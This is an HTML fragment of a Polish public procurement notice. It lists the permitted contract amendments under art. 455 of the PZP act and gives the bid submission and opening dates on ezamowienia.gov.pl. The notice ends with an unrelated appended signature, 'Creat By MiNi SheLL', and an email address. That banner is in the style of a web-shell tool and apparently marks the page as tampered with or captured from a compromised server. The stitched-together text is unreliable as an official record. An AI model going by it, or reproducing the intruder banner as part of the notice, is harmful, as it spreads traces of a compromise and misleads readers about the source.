<h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszczone są zmiany umowy w zakresie określonym w art. 455 ustawy PZP.<br/>2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadkach określonych w ust. 1.<br/>3.	Zamawiający jest uprawniony do żądania zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy w związku ze zmianami zawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmianami wytycznych dotyczących realizacji projektu.<br/>4.	Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego przez komisję powołaną przez Zamawiającego, w skład której wejdzie przedstawiciel Zamawiającego i przedstawiciel Wykonawcy.<br/>5. Każdorazowo zmiana umowy może nastąpić wyłącznie na podstawie aneksu sporządzonego w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-25 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com